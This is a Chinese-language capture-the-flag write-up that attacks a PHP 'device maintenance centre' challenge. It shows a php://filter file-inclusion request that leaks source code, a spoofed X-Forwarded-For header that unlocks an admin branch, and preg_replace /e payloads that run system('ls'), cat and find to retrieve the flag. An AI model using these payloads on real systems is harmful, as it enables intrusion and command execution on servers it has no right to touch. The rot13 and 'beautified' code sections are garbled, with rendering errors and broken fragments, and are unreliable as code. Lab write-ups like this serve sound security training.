查看題目:
提示:其他破壞者會利用工控云管理系統設備維護中心的后門入侵系統,可能和后門程式有關,位置在工控云管理系統的設備維護中心
打開題目地址:
查看頁面源代碼:
只有設備維護中心的鏈接點擊會跳轉到index.php:
顯示:資料介面請求例外
再查看index.php的源代碼:
在云平臺設備維護中心處有一個鏈接?page=index
點擊之后:
它以GET方式提交page變數的值為index,后端index.php處理之后回傳index,
傳入page=123456,回傳123456
所以我們需要構造傳入的引數,來讀取index.php的代碼,
通過變數傳參,有可能存在檔案包含漏洞讀取原始碼,php搭建的網站則使用php偽協議讀取原始碼:
php://filter 是php中獨有的一個協議,可以作為一個中間流來處理其他流,也可以進行任意檔案的讀取,具有resource(要過濾的資料流)、read(讀鏈篩選的資料流)、write(寫鏈篩選的資料流)等等引數,
php://filter
php://filter 是一種元封裝器, 設計用于資料流打開時的篩選過濾應用, 這對于一體式(all-in-one)的檔案函式非常有用,類似 readfile()、 file() 和 file_get_contents(), 在資料流內容讀取之前沒有機會應用其他過濾器,
php://filter 目標使用以下的引數作為它路徑的一部分, 復合過濾鏈能夠在一個路徑上指定,詳細使用這些引數可以參考具體范例,
| php://filter 引數 | |
|---|---|
| 名稱 | 描述 |
| resource=<要過濾的資料流> | 這個引數是必須的,它指定了你要篩選過濾的資料流, |
| read=<讀鏈的篩選串列> | 該引數可選,可以設定一個或多個過濾器名稱,以管道符( |
| write=<寫鏈的篩選串列> | 該引數可選,可以設定一個或多個過濾器名稱,以管道符( |
| <;兩個鏈的篩選串列> | 任何沒有以 read= 或 write= 作前綴 的篩選器串列會視情況應用于讀或寫鏈, |
php://filter常用于:
1、利用base64獲得原始碼
2、通過讀寫編碼實行繞過操作
構造傳入page的引數:
php://filter/read=convert.base64-encode/resource=index.php
意思是用php://filter協議讀取,用base64編碼的方式read=convert.base64-encode,來讀取index.php的代碼resource=index.php,
訪問:
http://111.200.241.244:62652/index.php?page=php://filter/read=convert.base64-encode/resource=index.php
這時頁面會顯示出源檔案index.php經過base64編碼后的內容:
PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNlc3Npb25fc3RhcnQoKTsKcG9zaXhfc2V0dWlkKDEwMDApOwoKCj8+CjwhRE9DVFlQRSBIVE1MPgo8aHRtbD4KCjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogICAgPG1ldGEgbmFtZT0icmVuZGVyZXIiIGNvbnRlbnQ9IndlYmtpdCI+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPWVkZ2UsY2hyb21lPTEiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLCBtYXhpbXVtLXNjYWxlPTEiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJsYXl1aS9jc3MvbGF5dWkuY3NzIiBtZWRpYT0iYWxsIj4KICAgIDx0aXRsZT7orr7lpIfnu7TmiqTkuK3lv4M8L3RpdGxlPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDx1bCBjbGFzcz0ibGF5dWktbmF2Ij4KICAgICAgICA8bGkgY2xhc3M9ImxheXVpLW5hdi1pdGVtIGxheXVpLXRoaXMiPjxhIGhyZWY9Ij9wYWdlPWluZGV4Ij7kupHlubPlj7Dorr7lpIfnu7TmiqTkuK3lv4M8L2E+PC9saT4KICAgIDwvdWw+CiAgICA8ZmllbGRzZXQgY2xhc3M9ImxheXVpLWVsZW0tZmllbGQgbGF5dWktZmllbGQtdGl0bGUiIHN0eWxlPSJtYXJnaW4tdG9wOiAzMHB4OyI+CiAgICAgICAgPGxlZ2VuZD7orr7lpIfliJfooag8L2xlZ2VuZD4KICAgIDwvZmllbGRzZXQ+CiAgICA8dGFibGUgY2xhc3M9ImxheXVpLWhpZGUiIGlkPSJ0ZXN0Ij48L3RhYmxlPgogICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2h0bWwiIGlkPSJzd2l0Y2hUcGwiPgogICAgICAgIDwhLS0g6L+Z6YeM55qEIGNoZWNrZWQg55qE54q25oCB5Y+q5piv5ryU56S6IC0tPgogICAgICAgIDxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ic2V4IiB2YWx1ZT0ie3tkLmlkfX0iIGxheS1za2luPSJzd2l0Y2giIGxheS10ZXh0PSLlvIB85YWzIiBsYXktZmlsdGVyPSJjaGVja0RlbW8iIHt7IGQuaWQ9PTEgMDAwMyA/ICdjaGVja2VkJyA6ICcnIH19PgogICAgPC9zY3JpcHQ+CiAgICA8c2NyaXB0IHNyYz0ibGF5dWkvbGF5dWkuanMiIGNoYXJzZXQ9InV0Zi04Ij48L3NjcmlwdD4KICAgIDxzY3JpcHQ+CiAgICBsYXl1aS51c2UoJ3RhYmxlJywgZnVuY3Rpb24oKSB7CiAgICAgICAgdmFyIHRhYmxlID0gbGF5dWkudGFibGUsCiAgICAgICAgICAgIGZvcm0gPSBsYXl1aS5mb3JtOwoKICAgICAgICB0YWJsZS5yZW5kZXIoewogICAgICAgICAgICBlbGVtOiAnI3Rlc3QnLAogICAgICAgICAgICB1cmw6ICcvc29tcnRoaW5nLmpzb24nLAogICAgICAgICAgICBjZWxsTWluV2lkdGg6IDgwLAogICAgICAgICAgICBjb2xzOiBbCiAgICAgICAgICAgICAgICBbCiAgICAgICAgICAgICAgICAgICAgeyB0eXBlOiAnbnVtYmVycycgfSwKICAgICAgICAgICAgICAgICAgICAgeyB0eXBlOiAnY2hlY2tib3gnIH0sCiAgICAgICAgICAgICAgICAgICAgIHsgZmllbGQ6ICdpZCcsIHRpdGxlOiAnSUQnLCB3aWR0aDogMTAwLCB1bnJlc2l6ZTogdHJ1ZSwgc29ydDogdHJ1ZSB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnbmFtZScsIHRpdGxlOiAn6K6+5aSH5ZCNJywgdGVtcGxldDogJyNuYW1lVHBsJyB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnYXJlYScsIHRpdGxlOiAn5Yy65Z+fJyB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnc3RhdHVzJywgdGl0bGU6ICfnu7TmiqTnirbmgIEnLCBtaW5XaWR0aDogMTIwLCBzb3J0OiB0cnVlIH0sCiAgICAgICAgICAgICAgICAgICAgIHsgZmllbGQ6ICdjaGVjaycsIHRpdGxlOiAn6K6+5aSH5byA5YWzJywgd2lkdGg6IDg1LCB0ZW1wbGV0OiAnI3N3aXRjaFRwbCcsIHVucmVzaXplOiB0cnVlIH0KICAgICAgICAgICAgICAgIF0KICAgICAgICAgICAgXSwKICAgICAgICAgICAgcGFnZTogdHJ1ZQogICAgICAgIH0pOwogICAgfSk7CiAgICA8L3NjcmlwdD4KICAgIDxzY3JpcHQ+CiAgICBsYXl1aS51c2UoJ2VsZW1lbnQnLCBmdW5jdGlvbigpIHsKICAgICAgICB2YXIgZWxlbWVudCA9IGxheXVpLmVsZW1lbnQ7IC8v5a+86Iiq55qEaG92ZXLmlYjmnpzjgIHkuoznuqfoj5zljZXnrYnlip/og73vvIzpnIDopoHkvp3otZZlbGVtZW505qih5Z2XCiAgICAgICAgLy/nm5HlkKzlr7zoiKrngrnlh7sKICAgICAgICBlbGVtZW50Lm9uKCduYXYoZGVtbyknLCBmdW5jdGlvbihlbGVtKSB7CiAgICAgICAgICAgIC8vY29uc29sZS5sb2coZWxlbSkKICAgICAgICAgICAgbGF5ZXIubXNnKGVsZW0udGV4dCgpKTsKICAgICAgICB9KTsKICAgIH0pOwogICAgPC9zY3JpcHQ+Cgo8P3BocAoKJHBhZ2UgPSAkX0dFVFtwYWdlXTsKCmlmIChpc3NldCgkcGFnZSkpIHsKCgoKaWYgKGN0eXBlX2FsbnVtKCRwYWdlKSkgewo/PgoKICAgIDxiciAvPjxiciAvPjxiciAvPjxiciAvPgogICAgPGRpdiBzdHlsZT0idGV4dC1hbGlnbjpjZW50ZXIiPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj48P3BocCBlY2hvICRwYWdlOyBkaWUoKTs/PjwvcD4KICAgIDxiciAvPjxiciAvPjxiciAvPjxiciAvPgoKPD9waHAKCn1lbHNlewoKPz4KICAgICAgICA8YnIgLz48YnIgLz48YnIgLz48YnIgLz4KICAgICAgICA8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOmNlbnRlciI+CiAgICAgICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgICAgICAgIDw/cGhwCgogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkcGFnZSwgJ2lucHV0JykgPiAwKSB7CiAgICAgICAgICAgICAgICAgICAgZGllKCk7CiAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkcGFnZSwgJ3RhOnRleHQnKSA+IDApIHsKICAgICAgICAgICAgICAgICAgICBkaWUoKTsKICAgICAgICAgICAgICAgIH0KCiAgICAgICAgICAgICAgICBpZiAoc3RycG9zKCRwYWdlLCAndGV4dCcpID4gMCkgewogICAgICAgICAgICAgICAgICAgIGRpZSgpOwogICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgIGlmICgkcGFnZSA9PT0gJ2luZGV4LnBocCcpIHsKICAgICAgICAgICAgICAgICAgICBkaWUoJ09rJyk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgaW5jbHVkZSgkcGFnZSk7CiAgICAgICAgICAgICAgICAgICAgZGllKCk7CiAgICAgICAgICAgICAgICA/PgogICAgICAgIDwvcD4KICAgICAgICA8YnIgLz48YnIgLz48YnIgLz48YnIgLz4KCjw/cGhwCn19CgoKLy/mlrnkvr/nmoTlrp7njrDovpPlhaXovpPlh7rnmoTlip/og70s5q2j5Zyo5byA5Y+R5Lit55qE5Yqf6IO977yM5Y+q6IO95YaF6YOo5Lq65ZGY5rWL6K+VCgppZiAoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10gPT09ICcxMjcuMC4wLjEnKSB7CgogICAgZWNobyAiPGJyID5XZWxjb21lIE15IEFkbWluICEgPGJyID4iOwoKICAgICRwYXR0ZXJuID0gJF9HRVRbcGF0XTsKICAgICRyZXBsYWNlbWVudCA9ICRfR0VUW3JlcF07CiAgICAkc3ViamVjdCA9ICRfR0VUW3N1Yl07CgogICAgaWYgKGlzc2V0KCRwYXR0ZXJuKSAmJiBpc3NldCgkcmVwbGFjZW1lbnQpICYmIGlzc2V0KCRzdWJqZWN0KSkgewogICAgICAgIHByZWdfcmVwbGFjZSgkcGF0dGVybiwgJHJlcGxhY2VtZW50LCAkc3ViamVjdCk7CiAgICB9ZWxzZXsKICAgICAgICBkaWUoKTsKICAgIH0KCn0KCgoKCgo/PgoKPC9ib2R5PgoKPC9odG1sPgo=
經過Base64解碼:
得到:
<?php
error_reporting(0);
@session_start();
posix_setuid(1000);
?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="stylesheet" href="layui/css/layui.css" media="all">
<title>設備維護中心</title>
<meta charset="utf-8">
</head>
<body>
<ul class="layui-nav">
<li class="layui-nav-item layui-this"><a href="?page=index">云平臺設備維護中心</a></li>
</ul>
<fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
<legend>設備串列</legend>
</fieldset>
<table class="layui-hide" id="test"></table>
<script type="text/html" id="switchTpl">
<!-- 這里的 checked 的狀態只是演示 -->
<input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="開|關" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
</script>
<script src="layui/layui.js" charset="utf-8"></script>
<script>
layui.use('table', function() {
var table = layui.table,
form = layui.form;
table.render({
elem: '#test',
url: '/somrthing.json',
cellMinWidth: 80,
cols: [
[
{ type: 'numbers' },
{ type: 'checkbox' },
{ field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
{ field: 'name', title: '設備名', templet: '#nameTpl' },
{ field: 'area', title: '區域' },
{ field: 'status', title: '維護狀態', minWidth: 120, sort: true },
{ field: 'check', title: '設備開關', width: 85, templet: '#switchTpl', unresize: true }
]
],
page: true
});
});
</script>
<script>
layui.use('element', function() {
var element = layui.element; //導航的hover效果、二級選單等功能,需要依賴element模塊
//監聽導航點擊
element.on('nav(demo)', function(elem) {
//console.log(elem)
layer.msg(elem.text());
});
});
</script>
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead"><?php echo $page; die();?></p>
<br /><br /><br /><br />
<?php
}else{
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead">
<?php
if (strpos($page, 'input') > 0) {
die();
}
if (strpos($page, 'ta:text') > 0) {
die();
}
if (strpos($page, 'text') > 0) {
die();
}
if ($page === 'index.php') {
die('Ok');
}
include($page);
die();
?>
</p>
<br /><br /><br /><br />
<?php
}}
//方便的實作輸入輸出的功能,正在開發中的功能,只能內部人員測驗
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
</body>
</html>
其他的加密方式也可以,如rot13:
http://111.200.241.244:62652/index.php?page=php://filter/read=string.rot13/resource=index.php
得到源檔案index.php經過rot13編碼后的內容:
設備維護中心 云平臺設備維護中心 設備串列 ynlhv.hfr(‘gnoyr’, shapgvba() { ine gnoyr =
ynlhv.gnoyr, sbez = ynlhv.sbez; gnoyr.eraqre({ ryrz: ‘#grfg’, hey:
‘/fbzeguvat.wfba’, pryyZvaJvqgu: 80, pbyf: [ [ { glcr: ‘ahzoref’ }, {
glcr: ‘purpxobk’ }, { svryq: ‘vq’, gvgyr: ‘VQ’, jvqgu: 100, haerfvmr:
gehr, fbeg: gehr }, { svryq: ‘anzr’, gvgyr: ‘設備名’, grzcyrg: ‘#anzrGcy’
}, { svryq: ‘nern’, gvgyr: ‘區域’ }, { svryq: ‘fgnghf’, gvgyr: ‘維護狀態’,
zvaJvqgu: 120, fbeg: gehr }, { svryq: ‘purpx’, gvgyr: ‘設備開關’, jvqgu:
85, grzcyrg: ‘#fjvgpuGcy’, haerfvmr: gehr } ] ], cntr: gehr }); });
ynlhv.hfr(‘ryrzrag’, shapgvba() { ine ryrzrag = ynlhv.ryrzrag;
//導航的ubire效果、二級選單等功能,需要依賴ryrzrag模塊 //監聽導航點擊 ryrzrag.ba(‘ani(qrzb)’,
shapgvba(ryrz) { //pbafbyr.ybt(ryrz) ynlre.zft(ryrz.grkg()); }); });
0) { qvr(); } vs (fgecbf( c n t r , ′ g n : g r k g ′ ) > 0 ) q v r ( ) ; v s ( f g e c b f ( cntr, 'gn:grkg') > 0) { qvr(); } vs (fgecbf( cntr,′gn:grkg′)>0)qvr();vs(fgecbf(cntr, ‘grkg’) > 0) { qvr(); } vs ( c n t r = = = ′ v a q r k . c u c ′ ) q v r ( ′ B x ′ ) ; v a p y h q r ( cntr === 'vaqrk.cuc') { qvr('Bx'); } vapyhqr( cntr===′vaqrk.cuc′)qvr(′Bx′);vapyhqr(cntr); qvr(); ?> Jrypbzr Zl Nqzva ! "; $cnggrea
= $_TRG[cng]; $ercynprzrag = $_TRG[erc]; $fhowrpg = T R G [ f h o ] ; v s ( v f f r g ( _TRG[fho]; vs (vffrg( T?RG[fho];vs(vffrg(cnggrea) && vffrg(KaTeX parse error: Expected 'EOF', got '&' at position 14: ercynprzrag) &?& vffrg(fhowrpg)) {
cert_ercynpr($cnggrea, $ercynprzrag, $fhowrpg); }ryfr{ qvr(); } } ?>
將上面的php代碼rot13解碼http://www.mxcz.net/tools/rot13.aspx:
得到:
layui.use(‘table’, function() { var table = layui.table, form =
layui.form; table.render({ elem: ‘#test’, url: ‘/somrthing.json’,
cellMinWidth: 80, cols: [ [ { type: ‘numbers’ }, { type: ‘checkbox’ },
{ field: ‘id’, title: ‘ID’, width: 100, unresize: true, sort: true },
{ field: ‘name’, title: ‘設備名’, templet: ‘#nameTpl’ }, { field: ‘area’,
title: ‘區域’ }, { field: ‘status’, title: ‘維護狀態’, minWidth: 120, sort:
true }, { field: ‘check’, title: ‘設備開關’, width: 85, templet:
‘#switchTpl’, unresize: true } ] ], page: true }); });
layui.use(‘element’, function() { var element = layui.element;
//導航的hover效果、二級選單等功能,需要依賴element模塊 //監聽導航點擊 element.on(‘nav(demo)’,
function(elem) { //console.log(elem) layer.msg(elem.text()); }); });
0) { die(); } if (strpos( p a g e , ′ t a : t e x t ′ ) > 0 ) d i e ( ) ; i f ( s t r p o s ( page, 'ta:text') > 0) { die(); } if (strpos( page,′ta:text′)>0)die();if(strpos(page, ‘text’) > 0) { die(); } if ( p a g e = = = ′ i n d e x . p h p ′ ) d i e ( ′ O k ′ ) ; i n c l u d e ( page === 'index.php') { die('Ok'); } include( page===′index.php′)die(′Ok′);include(page); die(); ?> Welcome My Admin ! "; $pattern
= $_GET[pat]; $replacement = $_GET[rep]; $subject = G E T [ s u b ] ; i f ( i s s e t ( _GET[sub]; if (isset( G?ET[sub];if(isset(pattern) && isset(KaTeX parse error: Expected 'EOF', got '&' at position 14: replacement) &?& isset(subject)) {
preg_replace($pattern, $replacement, $subject); }else{ die(); } } ?>
美化后的php代碼:
layui.use('element', function() {
var element = layui.element;
//導航的hover效果、二級選單等功能,需要依賴element模塊 //監聽導航點擊
element.on('nav(demo)', function(elem) {
//console.log(elem) layer.msg(elem.text());
}
);
}
);
0) {
die();
}
if (strpos($page, 'ta:text') > 0) {
die();
}
if (strpos($page, 'text') > 0) {
die();
}
if ($page === 'index.php') {
die('Ok');
}
include($page);
die();
?>
Welcome My Admin ! ";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
其中的關鍵部分代碼就是:
/
/方便的實作輸入輸出的功能,正在開發中的功能,只能內部人員測驗
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
代碼首先要求HTTP 擴展頭部X-FORWARDED-FOR:表示 HTTP 請求端真實 IP,是來自本地127.0.0.1
這個我們可以通過偽造XFF頭來登入系統:
X-Forwarded-For:127.0.0.1
然后3個變數從GET方式中獲取提交的引數,再判斷3個變數存在且非空,則執行preg_replace函式正則運算式替換字串:
preg_replace(PHP 5.5)語法:
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
搜索subject中匹配pattern的部分, 以replacement進行替換,
引數說明:
$pattern: 要搜索的模式,可以是字串或一個字串陣列,
$replacement: 用于替換的字串或字串陣列,
$subject: 要搜索替換的目標字串或字串陣列,
$limit: 可選,對于每個模式用于每個 subject 字串的最大可替換次數, 默認是-1(無限制),
$count: 可選,為替換執行的次數,
??這里我們需要利用preg_replace函式的一個“/e”模式:當pre_replace的引數pattern輸入“/e” 修正符的時候 ,preg_replace()函式將引數replacement的代碼當作PHP代碼執行,并且以eval函式的方式執行,
??我們要利用這個漏洞執行代碼,并確保replacement構成一個合法的 PHP 代碼字串,通過上面的代碼我們知道,我們通過GET方式提交的引數pat、rep、sub,只要在sub引數中有要搜索的pat的內容,同時將在rep前加上 “/e” 觸發漏洞,就可以執行replacement中的 PHP 代碼,
sub 和 pat 的引數構造只要滿足漏洞觸發的條件就行,rep引數則設定為php代碼命令phpinfo()輸出關于 PHP 配置的資訊:PHP編譯選項、啟用的擴展、PHP版本、服務器資訊和環境變數(如果編譯為一個模塊的話)、PHP環境變數、作業系統版本資訊、path變數、配置選項的本地值和主值、HTTP頭和PHP授權資訊(License),
以此確定任意命令執行漏洞的存在:
X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=phpinfo()&sub=123
發送之后得到的回應:
成功輸出關于 PHP 配置的資訊,證明任意命令執行漏洞確實存在
之后我們rep引數則設定為php代碼命令“system(‘ls’)”,這句代碼用于命令列執行 ls 命令顯示當前目錄下的所有檔案:
X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('ls')&sub=123
發送之后得到的回應:
得到當前目錄下的檔案和檔案夾有:css index.html index.php js layui logo.png s3chahahaDir start.sh 視圖.png
之后我們可以逐個查看檔案和檔案夾的內容,例如s3chahahaDir檔案夾看起來比較特別:
X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('ls+s3chahahaDir')&sub=123
發送之后得到的回應:
發現下面有個flag檔案或者檔案夾,繼續查看
X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('ls+s3chahahaDir/flag')&sub=123
發送之后得到的回應:
下面有一個flag.php,應該就是flag所在的檔案,查看它的內容:
X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=123
發送之后得到的回應:
得到flag:cyberpeace{3dd22031934397dc513678867ccef201}
其實也可以直接在所有目錄下搜索檔案名含flag的檔案快速查找:
X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('find+/+-name+"flag*"')&sub=123
發送之后得到的回應:
其實可以直接在當前目錄下搜索檔案名含flag的檔案快速查找,在find后面加個.就表示在當前目錄下搜索:
X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('find+.+-name+"flag*"')&sub=123
發送之后得到的回應:
從php 5.5.0后/e修飾符已經被棄用了,而7.0.0不再支持/e修飾符,PHP 5.5.0起,傳入"/e"修飾符的時候,會產生一個E_DEPRECATED 錯誤;PHP 7.0.0起,會產生E_WARNING錯誤,同時"/e"也無法起效,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/401563.html
標籤:其他
上一篇:OAuth安全相關問題